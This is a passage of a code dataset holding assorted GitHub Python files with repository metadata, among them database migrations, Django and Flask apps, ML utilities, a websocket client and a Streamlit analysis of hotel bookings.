image\nextractor.tensorToImage(image).save(config.final_image)\n","repo_name":"baishalidutta/Neural-Style","sub_path":"style_transfer.py","file_name":"style_transfer.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"45609243515","text":"\"\"\"add table users\n\nRevision ID: d104cec1a8a5\nRevises: 94410b910503\nCreate Date: 2022-04-13 21:43:12.337404\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd104cec1a8a5'\ndown_revision = '94410b910503'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'users',\n sa.Column('uuid', sa.String, primary_key=True),\n sa.Column('nickname', sa.String, nullable=True),\n sa.Column('created_ts', sa.Integer, nullable=True),\n sa.Column('mail', sa.String, nullable=False)\n )\n\n\ndef downgrade():\n op.drop_table('users')\n","repo_name":"Ka6ah505/stocks_assistant","sub_path":"alembic/versions/d104cec1a8a5_add_table_users.py","file_name":"d104cec1a8a5_add_table_users.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"39922739711","text":"from __future__ import annotations\n\nfrom typing import Any, Dict, NamedTuple, Optional, Union\n\nfrom shapely.geometry import LineString\n\n\nclass RoadId(NamedTuple):\n start: Union[int, str]\n end: Union[int, str]\n key: Union[int, str]\n\n def to_string(self) -> str:\n return f\"{self.start},{self.end},{self.key}\"\n\n def to_json(self) -> Dict[str, Any]:\n return self._asdict()\n\n @classmethod\n def from_string(cls, s: str) -> RoadId:\n start, end, key = s.split(\",\")\n return cls(start, end, key)\n\n @classmethod\n def from_json(cls, json: Dict[str, Any]) -> RoadId:\n return cls(**json)\n\n\nclass Road(NamedTuple):\n \"\"\"\n Represents a road that can be matched to;\n\n Attributes:\n road_id: The unique identifier for this road\n geom: The geometry of this road\n origin_junction_id: The unique identifier of the origin junction of this road\n destination_junction_id: The unique identifier of the destination junction of this road\n metadata: an optional dictionary for storing additional metadata\n \"\"\"\n\n road_id: RoadId\n\n geom: LineString\n metadata: Optional[dict] = None\n\n def to_dict(self) -> Dict[str, Any]:\n \"\"\"\n Convert the road to a dictionary\n \"\"\"\n d = self._asdict()\n d[\"origin_junction_id\"] = self.road_id.start\n d[\"destination_junction_id\"] = self.road_id.end\n d[\"road_key\"] = self.road_id.key\n\n return d\n\n def to_flat_dict(self) -> Dict[str, Any]:\n \"\"\"\n Convert the road to a flat dictionary\n \"\"\"\n if self.metadata is None:\n return self.to_dict()\n else:\n d = {**self.to_dict(), **self.metadata}\n del d[\"metadata\"]\n return d\n","repo_name":"NREL/mappymatch","sub_path":"mappymatch/constructs/road.py","file_name":"road.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"} +{"seq_id":"22774000303","text":"from rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom resource_tracker.models import ResourceGroupTextAttributeDefinition\nfrom tests.test_resource_tracker.test_api.base_test_api import BaseTestAPI\n\n\nclass TestTextAttributeDefinitionDelete(BaseTestAPI):\n\n def setUp(self):\n super(TestTextAttributeDefinitionDelete, self).setUp()\n self.to_be_deleted_id = self.rg_physical_servers_description.id\n self.url = reverse('api_text_attribute_definition_retrieve_update_delete',\n args=[self.rg_physical_servers.id,\n self.rg_physical_servers_description.id])\n\n def test_text_attribute_definition_delete(self):\n self.assertTrue(ResourceGroupTextAttributeDefinition.objects.filter(id=self.to_be_deleted_id).exists())\n response = self.client.delete(self.url, format='json')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(ResourceGroupTextAttributeDefinition.objects.filter(id=self.to_be_deleted_id).exists())\n\n def test_cannot_delete_text_attribute_definition_when_wrong_rg(self):\n url = reverse('api_text_attribute_definition_retrieve_update_delete',\n args=[self.rg_ocp_projects.id,\n self.rg_physical_servers_description.id])\n response = self.client.delete(url, format='json')\n self.assertEqual(response.status_code, 
status.HTTP_404_NOT_FOUND)\n","repo_name":"EliasBoulharts/squest","sub_path":"tests/test_resource_tracker/test_api/test_resource_group_api_views/test_rg_text_attribute_definition_api_views/test_delete.py","file_name":"test_delete.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"9073499425","text":"import os\nimport time\nimport logging\nfrom collections import OrderedDict\nimport copy\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom smac.runhistory.runhistory2epm import RunHistory2EPM4Cost\nfrom smac.epm.rf_with_instances import RandomForestWithInstances\nfrom smac.utils.util_funcs import get_types\nfrom smac.tae.execute_ta_run import StatusType\n\n\nclass FeatureForwardSelector():\n \"\"\" Inspired by forward selection of ParameterImportance-package. \"\"\"\n\n def __init__(self, scenario, runhistory, to_evaluate: int=3):\n \"\"\"\n Constructor\n :parameter:\n scenario\n SMAC scenario object\n to_evaluate\n int. Indicates for how many parameters the Importance values have to be computed\n \"\"\"\n self.logger = logging.getLogger(\n self.__module__ + '.' + self.__class__.__name__)\n\n self.scenario = copy.deepcopy(scenario)\n self.cs = scenario.cs\n self.rh = runhistory\n self.to_evaluate = to_evaluate\n\n self.MAX_SAMPLES = 100000\n\n self.model = None\n\n def run(self):\n \"\"\"\n Implementation of the forward selection loop.\n Uses SMACs EPM (RF) wrt the feature space to minimize the OOB error.\n\n Returns\n -------\n feature_importance: OrderedDict\n dict_keys (first key -> most important) -> OOB error\n \"\"\"\n parameters = [p.name for p in self.scenario.cs.get_hyperparameters()]\n self.logger.debug(\"Parameters: %s\", parameters)\n\n rh2epm = RunHistory2EPM4Cost(scenario=self.scenario, num_params=len(parameters),\n success_states=[StatusType.SUCCESS,\n StatusType.CAPPED,\n StatusType.CRASHED],\n impute_censored_data=False, impute_state=None)\n\n X, y = rh2epm.transform(self.rh)\n\n # reduce sample size to speedup computation\n if X.shape[0] > self.MAX_SAMPLES:\n idx = np.random.choice(X.shape[0], size=self.MAX_SAMPLES, replace=False)\n X = X[idx, :]\n y = y[idx]\n\n self.logger.debug(\"Shape of X: %s, of y: %s, #parameters: %s, #feats: %s\",\n X.shape, y.shape,\n len(parameters),\n len(self.scenario.feature_names))\n names = copy.deepcopy(self.scenario.feature_names)\n self.logger.debug(\"Features: %s\", names)\n\n used = list(range(0, len(parameters)))\n feat_ids = {f: i for i, f in enumerate(names, len(used))}\n ids_feat = {i: f for f, i in feat_ids.items()}\n self.logger.debug(\"Used: %s\", used)\n evaluated_feature_importance = OrderedDict()\n\n types, bounds = get_types(self.scenario.cs, self.scenario.feature_array)\n\n last_error = np.inf\n\n for _round in range(self.to_evaluate): # Main Loop\n errors = []\n for f in names:\n i = feat_ids[f]\n self.logger.debug('Evaluating %s', f)\n used.append(i)\n self.logger.debug('Used features: %s',\n str([ids_feat[j] for j in used[len(parameters):]]))\n\n start = time.time()\n self._refit_model(types[sorted(used)], bounds, X[:, sorted(used)], y) # refit the model every round\n errors.append(self.model.rf.out_of_bag_error())\n used.pop()\n self.logger.debug('Refitted RF (sec %.2f; error: %.4f)' % (time.time() - start, errors[-1]))\n else:\n self.logger.debug('Evaluating None')\n start = time.time()\n self._refit_model(types[sorted(used)], bounds, X[:, sorted(used)], y) # refit the model every round\n 
errors.append(self.model.rf.out_of_bag_error())\n self.logger.debug('Refitted RF (sec %.2f; error: %.4f)' % (time.time() - start, errors[-1]))\n if _round == 0:\n evaluated_feature_importance['None'] = errors[-1]\n best_idx = np.argmin(errors)\n lowest_error = errors[best_idx]\n\n if best_idx == len(errors) - 1:\n self.logger.info('Best thing to do is add nothing')\n best_feature = 'None'\n # evaluated_feature_importance[best_feature] = lowest_error\n break\n elif lowest_error >= last_error:\n break\n else:\n last_error = lowest_error\n best_feature = names.pop(best_idx)\n used.append(feat_ids[best_feature])\n\n self.logger.debug('%s: %.4f' % (best_feature, lowest_error))\n evaluated_feature_importance[best_feature] = lowest_error\n\n self.logger.debug(evaluated_feature_importance)\n self.evaluated_feature_importance = evaluated_feature_importance\n return evaluated_feature_importance\n\n def _refit_model(self, types, bounds, X, y):\n \"\"\"\n Easily allows for refitting of the model.\n\n Parameters\n ----------\n types: list\n SMAC EPM types\n X:ndarray\n X matrix\n y:ndarray\n corresponding y vector\n \"\"\"\n # take at most 80% of the data per split to ensure enough data for oob error\n self.model = RandomForestWithInstances(types=types, bounds=bounds, do_bootstrapping=True,\n n_points_per_tree=int(X.shape[1]*0.8))\n self.model.rf_opts.compute_oob_error = True\n self.model.train(X, y)\n\n def _plot_result(self, output_fn, bar=True):\n \"\"\"\n plot oob score as bar charts\n Parameters\n ----------\n name\n file name to save plot\n \"\"\"\n\n fig, ax = plt.subplots()\n features = list(self.evaluated_feature_importance.keys())\n errors = list(self.evaluated_feature_importance.values())\n max_to_plot = min(len(errors), 5)\n\n ind = np.arange(len(errors))\n if bar:\n ax.bar(ind, errors, color=(0.25, 0.25, 0.45))\n else:\n ax.plot(ind, errors, lw=4, color=(0.125, 0.125, 0.125))\n\n ax.set_ylabel('error', size='24', family='sans-serif')\n if bar:\n ax.set_xticks(ind)\n ax.set_xlim(-.5, max_to_plot - 0.5)\n else:\n ax.set_xticks(ind)\n ax.set_xlim(0, max_to_plot - 1)\n ax.set_xticklabels(features, rotation=30, ha='right', size='10',\n family='monospace')\n ax.xaxis.grid(True)\n ax.yaxis.grid(True)\n\n plt.tight_layout()\n\n out_dir = os.path.dirname(output_fn)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n fig.savefig(output_fn)\n return output_fn\n\n def plot_result(self, output_fn=None):\n plot_paths = []\n plot_paths.append(\n self._plot_result(output_fn + '-barplot.png', True))\n plot_paths.append(\n self._plot_result(output_fn + '-chng.png', False))\n plt.close('all')\n self.logger.debug('Saved plot as %s-[barplot|chng].png' % output_fn)\n return plot_paths\n","repo_name":"timothyyu/ml_monorepo","sub_path":"CAVE/cave/feature_analysis/feature_imp.py","file_name":"feature_imp.py","file_ext":"py","file_size_in_byte":7297,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"32131498856","text":"import asyncio\nimport json\nimport os\nimport sys\n\nimport websockets\nfrom aioconsole import ainput\n\nimport global_config\n\n\nclass Runner:\n def __init__(self):\n self.websocket = None\n self.have_orders = False\n self.input_type = 'bouquet_design'\n self.reader = None\n\n @property\n def input_type_input_prefix_map(self):\n map_ = dict(\n bouquet_design='Enter a bouquet design or empty line',\n flower='Enter a flower'\n )\n return map_\n\n @property\n def input_type(self):\n return self.__input_type\n\n @input_type.setter\n 
def input_type(self, i_type: str):\n        assert i_type in ('bouquet_design', 'flower')\n        self.__input_type = i_type\n\n    async def send_client_input(self):\n        while True:\n            input_prefix = self.input_type_input_prefix_map[self.input_type]\n\n            if len(sys.argv) > 1:\n                test_file_name = sys.argv[1]\n                test_file_path = os.path.join(os.getcwd(), test_file_name)\n                for client_input in self.test_file_reader(test_file_path):\n                    if client_input.strip() == 'stop':\n                        await asyncio.sleep(999999)\n\n                    self.have_orders = True\n                    jsn = json.dumps({'type': self.input_type, 'payload': client_input.strip()})\n\n                    if not client_input.strip() and self.have_orders:\n                        self.input_type = 'flower'\n\n                    await self.websocket.send(jsn)\n\n            else:\n                client_input = await ainput(f\"{input_prefix}: \")\n\n                if not client_input.strip() and self.have_orders:\n                    self.input_type = 'flower'\n\n                self.have_orders = True\n                jsn = json.dumps({'type': self.input_type, 'payload': client_input})\n                await self.websocket.send(jsn)\n\n    async def read_server_response(self):\n        while True:\n            msg = await self.websocket.recv()\n            if msg == 'close':\n                await self.websocket.close()\n            elif 'all orders completed' in msg.lower():\n                self.input_type = 'bouquet_design'\n                self.have_orders = False\n            print(f\"\\n{msg}\")\n\n    async def run(self):\n        uri = f\"ws://{global_config.PROD_LINE_HOST_NAME}:{global_config.PROD_LINE_PORT}/{global_config.PROD_LINE_URL}\"\n\n        async with websockets.connect(uri) as websocket:\n            self.websocket = websocket\n            await asyncio.gather(\n                self.send_client_input(),\n                self.read_server_response(),\n                return_exceptions=True,\n            )\n\n    @staticmethod\n    def test_file_reader(file):\n        with open(file) as f:\n            for line in f.readlines():\n                yield line\n\n\nif __name__ == '__main__':\n    runner = Runner()\n\n    try:\n        asyncio.run(runner.run())\n    except KeyboardInterrupt:\n        exit(1)\n","repo_name":"E1Adamov/bouquet_production_line","sub_path":"cli_client.py","file_name":"cli_client.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74618405813","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n    url(r'^$', views.logsHome, name='logsHome'),\n    url(r'^accessLogs', views.accessLogs, name='accessLogs'),\n    url(r'^errorLogs', views.errorLogs, name='errorLogs'),\n    url(r'^emaillogs', views.emailLogs, name='emaillogs'),\n    url(r'^ftplogs', views.ftplogs, name='ftplogs'),\n    url(r'^modSecAuditLogs', views.modSecAuditLogs, name='modSecAuditLogs'),\n    url(r'^getLogsFromFile',views.getLogsFromFile, name=\"getLogsFromFile\"),\n    url(r'^clearLogFile',views.clearLogFile, name=\"clearLogFile\"),\n    url(r'^serverMail$', views.serverMail, name=\"serverMail\"),\n    url(r'^saveSMTPSettings$', views.saveSMTPSettings, name=\"saveSMTPSettings\"),\n]","repo_name":"usmannasir/cyberpanel","sub_path":"serverLogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":1302,"dataset":"github-code","pt":"21"}
+{"seq_id":"36467665879","text":"from django.conf.urls import url\r\n\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index_view, name='index'),\r\n url(r'^register/', views.register_view, name='register'),\r\n url(r'^do_register/', views.do_register_aciton, name='do_register'),\r\n url(r'^username_check/', views.username_check_aciton, name='username_check'),\r\n url(r'^register_suc/', views.register_suc_view, name='register_suc'),\r\n url(r'^register_fail/', views.register_fail_view, name='register_fail'),\r\n url(r'^do_logout/', views.do_logout_aciton, name='do_logout'),\r\n url(r'^login', views.login_view, name='login'),\r\n url(r'^do_login/', views.do_login_aciton, name='do_login'), \r\n]","repo_name":"yangruihan/yrh_website","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73262873653","text":"import joblib\r\nfrom flask import Flask, render_template, request\r\nfrom helpers.dummies import *\r\n\r\n\r\napp = Flask(__name__)\r\nmodel = joblib.load('model3.h5')\r\nscaler = joblib.load('scaler3.h5')\r\n\r\n\r\n# weather = ['mist', 'rainy', 'snowy']\r\n# weather_dummies = [0 for i in range(3)]\r\n# try:\r\n# idx = weather.index(request.args['weather'])\r\n# weather_dummies[idx] = 1\r\n# except:\r\n# pass\r\n\r\n\r\n\r\n@app.route('/',methods=['GET'])\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/predict',methods=['GET'])\r\ndef predict():\r\n ''''\r\n data = [\r\n float(request.args['temp']),\r\n float(request.args['humidity']),\r\n int(request.args['hour']),\r\n int(request.args['is_rush_hour']),\r\n int(request.args['month'])\r\n ]\r\n '''\r\n\r\n data = [\r\n float(request.args['Gender']),\r\n float(request.args['Married']),\r\n float(request.args['Education']),\r\n float(request.args['Self_Employed']),\r\n int(request.args['ApplicantIncome']),\r\n int(request.args['CoapplicantIncome']),\r\n int(request.args['LoanAmount']),\r\n int(request.args['Loan_Amount_Term']),\r\n int(request.args['Credit_History'])\r\n ]\r\n\r\n data += Dependents_dummies[request.args['Dependents']]\r\n\r\n data += Property_Area_dummies[request.args['Property_Area']]\r\n\r\n prediction = round(model.predict(scaler.transform([data]))[0])\r\n x=\" \"\r\n if prediction ==1:\r\n x=\"able\"\r\n else:\r\n x=\" not able\"\r\n\r\n return render_template('index.html', prediction_text='The customer is {} to repay the loan '.format(x))\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"Eman104/loan-classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5778591056","text":"# 125. Valid Palindrome\n#\n# A phrase is a palindrome if, after converting all uppercase letters into\n# lowercase letters and removing all non-alphanumeric characters, it reads the\n# same forward and backward. 
Alphanumeric characters include letters and\n# numbers.\n# Given a string s, return true if it is a palindrome, or false otherwise.\n\nimport re\n\nexample1_arg1 = \"A man, a plan, a canal: Panama\"\nexample1_out = True\n\nexample2_arg1 = \"race a car\"\nexample2_out = False\n\nexample3_arg1 = \" \"\nexample3_out = True\n\n\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n lower = s.lower()\n # print(lower)\n pattern = re.compile('[^a-zA-Z0-9]')\n alphanum_lower = re.sub(pattern, '', lower)\n # print(alphanum_lower)\n if alphanum_lower == alphanum_lower[::-1]:\n return True\n else:\n return False\n\n\nprint(Solution().isPalindrome(example1_arg1) == example1_out)\nprint(Solution().isPalindrome(example2_arg1) == example2_out)\nprint(Solution().isPalindrome(example3_arg1) == example3_out)\n","repo_name":"jowls/challenges","sub_path":"leetcode/python/125.py","file_name":"125.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4627177083","text":"import logging\nimport os\n\nimport chainer\n\n\ndef collect_demonstrations(agent,\n env,\n steps,\n episodes,\n outdir,\n max_episode_len=None,\n logger=None):\n \"\"\"Collects demonstrations from an agent and writes them to a file.\n\n Args:\n agent: Agent from which demonstrations are collected.\n env: Environment in which the agent produces demonstrations.\n steps (int): Number of total time steps to collect demonstrations for.\n episodes (int): Number of total episodes to collect demonstrations for.\n outdir (str): Path to the directory to output demonstrations.\n max_episode_len (int): Maximum episode length.\n logger (logging.Logger): Logger used in this function.\n \"\"\"\n assert (steps is None) != (episodes is None)\n logger = logger or logging.getLogger(__name__)\n\n with chainer.datasets.open_pickle_dataset_writer(\n os.path.join(outdir, \"demos.pickle\")) as dataset:\n # o_0, r_0\n terminate = False # True if we should stop collecting demos\n timestep = 0 # number of timesteps of demos collected\n episode_num = 0 # number of episodes of demos collected\n episode_len = 0 # length of most recent episode\n reset = True # whether to reset environment\n episode_r = 0 # Episode reward\n while not terminate:\n if reset:\n if episode_num > 0:\n logger.info('demonstration episode %s length:%s R:%s',\n episode_num, episode_len, episode_r)\n obs = env.reset()\n done = False\n r = 0\n episode_r = 0\n episode_len = 0\n info = {}\n # a_t\n a = agent.act(obs)\n # o_{t+1}, r_{t+1}\n new_obs, r, done, info = env.step(a)\n # o_t, a_t, r__{t+1}, o_{t+1}\n dataset.write((obs, a, r, new_obs, done, info))\n obs = new_obs\n reset = (done or episode_len == max_episode_len\n or info.get('needs_reset', False))\n timestep += 1\n episode_len += 1\n episode_r += r\n episode_num = episode_num + 1 if reset else episode_num\n if steps is None:\n terminate = episode_num >= episodes\n else:\n terminate = timestep >= steps\n if reset or terminate:\n agent.stop_episode()\n if terminate:\n # log final episode\n logger.info('demonstration episode %s length:%s R:%s',\n episode_num, episode_len, episode_r)\n","repo_name":"chainer/chainerrl","sub_path":"chainerrl/experiments/collect_demos.py","file_name":"collect_demos.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":1134,"dataset":"github-code","pt":"21"} +{"seq_id":"6923500872","text":"# (c) 2014, Dean Wilson \r\n#\r\n# Ansible is free software: you can 
redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Ansible is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with Ansible. If not, see .\r\n\r\nfrom ansible import utils, errors\r\n\r\ntry:\r\n import boto\r\n import boto.cloudformation\r\nexcept ImportError:\r\n raise errors.AnsibleError(\r\n \"Can't LOOKUP(cloudformation): module boto is not installed\")\r\n\r\n\r\nclass Cloudformation(object):\r\n\r\n def __init__(self, region, stack_name):\r\n self.region = region\r\n self.stack_name = stack_name\r\n\r\n def get_output(self, key):\r\n conn = boto.cloudformation.connect_to_region(self.region)\r\n stack = conn.describe_stacks(stack_name_or_id=self.stack_name)[0]\r\n value = [output.value for output in stack.outputs if output.key == key]\r\n\r\n return value\r\n\r\n\r\nclass LookupModule(object):\r\n\r\n def __init__(self, basedir=None, **kwargs):\r\n self.basedir = basedir\r\n\r\n def run(self, terms, inject=None, **kwargs):\r\n region, stack, value_type, key = terms.split('/')\r\n\r\n self.cfn = Cloudformation(region, stack)\r\n\r\n value = False\r\n if value_type == 'output':\r\n value = self.cfn.get_output(key)\r\n\r\n return value\r\n","repo_name":"omarlari/ansibleCloudformation","sub_path":"plugins/lookup_plugins/cloudformation.py","file_name":"cloudformation.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"17726731783","text":"import tkinter as tk\nfrom Subject import Subject\n\n\nclass SubjectLabel(tk.Label):\n\n def __init__(self,Frame,lecText,tutText=None):\n self.cd , self.dy , self.stH , self.stM , self.enH , self.enM = lecText.split(\",\")\n if not (tutText == None):\n #splitting string\n self.dy1 , self.stH1 , self.stM1 , self.enH1 , self.enM1 = tutText.split(\",\")\n\n #intializing Subject object\n self.SubObj = Subject(self.cd , self.dy , int(self.stH) , int(self.stM) , int(self.enH) , int(self.enM)\n ,Subject(self.cd, self.dy1 , int(self.stH1) , int(self.stM1) , int(self.enH1) , int(self.enM1)))\n\n #intializing Subejct Label\n self.SubLabel = tk.Label(Frame, text = \"Lecture : \" + self.SubObj.code + ' ' + self.SubObj.day + ' '+ str(self.SubObj.startTime) + ' to ' + str(self.SubObj.endTime) +\n ' Tut : ' + self.SubObj.link.day + ' ' + str(self.SubObj.link.startTime) + ' to ' + str(self.SubObj.link.endTime) , pady = 10)\n\n else:\n \n #intializing Subject object\n self.SubObj = Subject(self.cd , self.dy ,int(self.stH) , int(self.stM) , int(self.enH) , int(self.enM))\n\n #intializing Subejct Label\n self.SubLabel = tk.Label(Frame, text = \"Lecture : \" + self.SubObj.code + ' ' + self.SubObj.day + ' '+ str(self.SubObj.startTime) + ' to ' + str(self.SubObj.endTime),pady = 10)\n\n\n\n\n\n","repo_name":"Abdelrhman-Hosny/CU_Schedule_Picker","sub_path":"SubjectLabel.py","file_name":"SubjectLabel.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39604364764","text":"#import\nimport streamlit as st\nimport numpy as np\nimport pandas 
as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#deal with the data\ndf = pd.read_csv('hotel_bookings.csv')\n\n#Deal with missing data\ndf.isnull().sum().sort_values(ascending=False)\n\n#Processing outliers (With ipynb, we can see what data needs to be processed)\ndf.loc[df['lead_time'] > 380, ['lead_time'] ] = 380\ndf.loc[df['stays_in_weekend_nights'] > 6, ['stays_in_weekend_nights'] ] = 6\ndf.loc[df['stays_in_week_nights'] > 10, ['stays_in_week_nights'] ] = 10\ndf.loc[df['adults'] > 4, ['adults'] ] = 4\ndf.loc[df['children'] > 8, ['lead_time'] ] = 0\ndf.loc[df['babies'] > 8, ['babies'] ] = 0\ndf.loc[df['booking_changes'] > 5, ['booking_changes'] ] = 5\ndf.loc[df['days_in_waiting_list'] > 0, ['days_in_waiting_list'] ] = 1\ndf.loc[df['previous_cancellations'] > 0, ['previous_cancellations'] ] = 1\ndf.loc[df['previous_bookings_not_canceled'] > 0, ['previous_bookings_not_canceled']] = 1\n\n#Clear duplicate data\ndf.duplicated().sum()\ndf.drop_duplicates(inplace = True)\n#More than 30,000 duplicate pieces of data were deleted\n\nbase=\"dark\"\nprimaryColor=\"purple\"\n#set a cover\nst.markdown('![cover 2](https://user-images.githubusercontent.com/115609247/200618168-afd33584-0aed-4fc1-a1bf-8071a99b19c3.jpg)')\nst.title('Final project by YucenXie & BeiChen')\n\n#show the basic dataset\nst.header('Introduction of Hotel_Dataset ')\ndf\n\n#Show some pictures of basic data\nst.header('Basic conclusion about the dataset')\nfig, ax = plt.subplots(2, 3,figsize=(30, 20))\ndf['hotel'].value_counts().plot.pie(ax=ax[0,0])\nax[0,0].set_title('Distribution of the type of Hotel')\n\ndf['meal'].value_counts().plot.pie(ax=ax[0,1])\nax[0,1].axis('equal') \nax[0,1].set_title('Distribution of the type of Meal')\n\n#pic3\nconfirmed_bookings = df[df['is_canceled'] ==0]\ndata = confirmed_bookings['is_repeated_guest'].value_counts()\ncolors = sns.color_palette('Paired')\nlabels = ['new guest', 'repeated guest']\n\nax[0,2].pie(data, labels = labels, autopct = '%.0f%%', colors = colors)\nax[0,2].set_title('Bookings by new and repeated guest')\n\n#pic4\n\nsns.countplot(ax=ax[1,0],x = 'hotel', data = df, hue = 'is_canceled', palette = 'magma_r', alpha = 0.8).set(xlabel = None)\nax[1,0].set_title('Cancelation rates by hotel')\n\n#pic5\nplt.figure(figsize=(10,10))\nsns.countplot(ax=ax[1,1],x='total_of_special_requests', data=df, palette = 'ocean_r')\nax[1,1].set_title('Total Special Request', weight='bold')\nax[1,1].set_xlabel('Number of Special Request', fontsize=12)\nax[1,1].set_ylabel('Count', fontsize=12)\n\n#pic6\ndf['kids'] = df['children'] + df['babies']\ndf['family'] = np.where(df['kids'] > 0, '1', '0')\nconfirmed_bookings = df[df['is_canceled'] == 0]\n\n\npalette = [\"#457b9d\", \"#a8dadc\"]\nsns.countplot(ax=ax[1,2],data = confirmed_bookings, x = 'hotel', hue = 'family', palette = palette, alpha = 0.8).set(xlabel = None)\nax[1,2].set_title('Families by hotel')\n\nst.pyplot(fig)\n\n\n\nst.header('Some filters & Visualization')\n#Interactive tools 1\n# create a price filter\nadr_filter = st.sidebar.slider('Average room price(adr)', 62.0, 157.71, 65.0) # min, max, default\n# filter by price\ndf = df[df.adr >= adr_filter]\n\n#Interactive tools 1\n# create a multi select marker-segment\nmarket_segment_filter = st.sidebar.multiselect(\n 'Chose the Market Segment type',\n df.market_segment.unique(), # options\n df.market_segment.unique()) # defaults\n# filter by market segment\ndf = df[df.market_segment.isin(market_segment_filter)]\n\n#Interactive tools 3\n# create a babies and children 
filter\ndf['babies_and_children'] = df['babies'] + df['children']\nchildren_and_babies_filter = st.sidebar.radio(\n \"Chose the customers have children or not\",\n ('Only adults', 'Babies and Children with adults'))\n# filter by children/babies\nif children_and_babies_filter == 'Only adults':\n df = df[df.babies_and_children == 0]\nelif children_and_babies_filter == 'Babies and Children':\n df = df[df.babies_and_children >0]\n\n\n#Influencing factors related to cancellation rate\nst.subheader('Cancellation')\n#The relationship between cancellation rates and years and months\n\n#Year\nst.write('Cancellation rate about year and month')\ndf_cancel_year=pd.crosstab(df.arrival_date_year,df.is_canceled,margins=True)\ndf_cancel_year['cancel-percent']=df_cancel_year[1]*100/df_cancel_year['All']\ndf_cancel_year.drop('All',inplace=True)\n\n#Month\ndf_cancel_month=pd.crosstab(df.arrival_date_month,df.is_canceled,margins=True)\ndf_cancel_month['cancel-percent']=df_cancel_month[1]*100/df_cancel_month['All']\ndf_cancel_month.drop('All',inplace=True)\n\n#Typesetting\nfig, ax = plt.subplots(1, 2,figsize=(15, 5))\ndf_cancel_year['cancel-percent'].plot.bar(ax=ax[0],color='#C9BFCB')\nax[0].set_xlabel('Year')\nax[0].set_ylabel('cancellation')\ndf_cancel_month['cancel-percent'].plot.bar(ax=ax[1],color='#A58E9E')\nax[1].set_xlabel('Month')\nax[1].set_ylabel('cancellation')\nst.pyplot(fig)\n\n\n#create a bar to show the canlellation rate about the lead time\ndf_cancel_leadtime = pd.crosstab(df.lead_time,df.is_canceled,margins=True)\ndf_cancel_leadtime['cancel-percent']=df_cancel_leadtime[1]*100/df_cancel_leadtime['All']\ndf_cancel_leadtime.drop('All',axis=1,inplace=True)\ndf_cancel_leadtime.drop('All',axis=0,inplace=True)\nst.write('Cancellation rate about the lead time')\nfig, ax =plt.subplots(figsize=(15,5))\ndf_cancel_leadtime['cancel-percent'].plot(color='#BAB5D6')\nst.pyplot(fig)\n\n#Whether a deposit is paid or not and the number of cancellations\nst.write('Cancellation rate about the deposite')\ndf['is_canceled']=df['is_canceled'].astype('str')\ncanceled_bookings = df[df['is_canceled'] == '1']\nfig, ax = plt.subplots(figsize = (15, 5))\nsns.countplot(ax = ax, y = 'deposit_type', data = canceled_bookings, orient = \"h\" ,palette = 'BuPu').set(ylabel = None)\nax.bar_label(ax.containers[0], padding = 4)\nplt.title('Deposit type of cancelled bookings')\nst.pyplot(fig)\n\n#Relationship between customer type and number of cancellations\nst.write('Cancellation rate about the customer type')\nfig, ax =plt.subplots(figsize=(20, 10))\ndf1=df[df['customer_type']=='Transient']\ndf1_cancel = 